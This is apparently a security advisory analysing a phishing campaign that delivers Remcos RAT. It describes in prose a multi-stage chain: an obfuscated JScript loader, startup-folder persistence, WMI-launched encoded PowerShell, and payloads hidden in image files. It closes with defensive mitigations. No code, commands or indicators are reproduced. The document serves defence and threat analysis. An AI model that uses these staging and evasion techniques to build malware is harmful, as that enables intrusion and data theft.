This malware campaign leverages phishing emails with spoofed sender addresses and embedded logos to appear legitimate, targeting users primarily via email attachments. The initial payload is a large (1.17 MB) JScript file compressed in a GZIP envelope, containing extensive obfuscation with thousands of repeated lines to evade static detection. The script attempts persistence by copying itself to the Windows startup folder and then constructs a PowerShell command executed via WMI's Win32_Process.Create method to run a Base64-encoded PowerShell script. This PowerShell script downloads a disguised JPEG file (with a PNG extension) from a now-defunct URL, which contains an embedded Base64-encoded payload. The payload is extracted and loaded via reflection, invoking its Main method with parameters indicating use of the Windows Downloads folder and command line execution. A secondary URL hosts a reversed and Base64-encoded executable, which upon decoding is identified as Remcos RAT, a well-known remote access Trojan capable of extensive system compromise. The campaign uses layered obfuscation techniques including string splitting, garbage string insertion, and Base64 encoding to hinder analysis. The phishing emails fail DMARC/SPF checks, which may allow email gateways to quarantine them. Indicators of Compromise (IoCs) include specific URLs, file hashes for the JScript, encoded TXT, and decoded EXE files. The campaign demonstrates a sophisticated multi-stage infection chain combining social engineering, script-based loaders, and image file steganography to deliver a potent RAT payload.

Organizations worldwide face significant risks from this campaign due to the stealthy delivery of Remcos RAT, which can enable attackers to gain persistent remote access, exfiltrate sensitive data, execute arbitrary commands, and deploy further malware. The use of obfuscated scripts and image-based payloads complicates detection by traditional antivirus and email filtering solutions. If successful, infections can lead to data breaches, intellectual property theft, operational disruption, and potential lateral movement within networks. The phishing vector targets end users, increasing the likelihood of initial compromise in organizations with insufficient email security awareness or controls. The persistence mechanism ensures the malware survives reboots, prolonging attacker access. The campaign's use of legitimate-looking spoofed emails and embedded logos increases the chance of user interaction, especially in regions where the spoofed companies operate. Although no widespread exploitation is currently reported, the presence of active URLs and known RAT payloads indicates a credible threat that could escalate if not mitigated.

1. Enforce strict email authentication protocols including DMARC, SPF, and DKIM to block spoofed emails and quarantine suspicious messages. 2. Deploy advanced email filtering solutions capable of detecting and blocking large obfuscated script attachments and compressed archives. 3. Implement endpoint detection and response (EDR) tools with behavioral analysis to identify script-based execution, PowerShell abuse, and suspicious process creation via WMI. 4. Restrict execution of scripts from email attachments and untrusted locations, and disable or tightly control PowerShell execution policies, especially for encoded commands. 5. Monitor and block known malicious URLs and domains associated with this campaign at the network perimeter. 6. Conduct user awareness training focusing on phishing recognition, especially regarding spoofed sender addresses and unexpected attachments. 7. Regularly audit startup folders and scheduled tasks for unauthorized persistence mechanisms. 8. Use threat intelligence feeds to update detection signatures with IoCs such as file hashes and URLs from this campaign. 9. Employ sandboxing solutions to analyze suspicious attachments in a controlled environment before delivery to end users. 10. Maintain up-to-date backups and incident response plans to quickly recover from potential infections.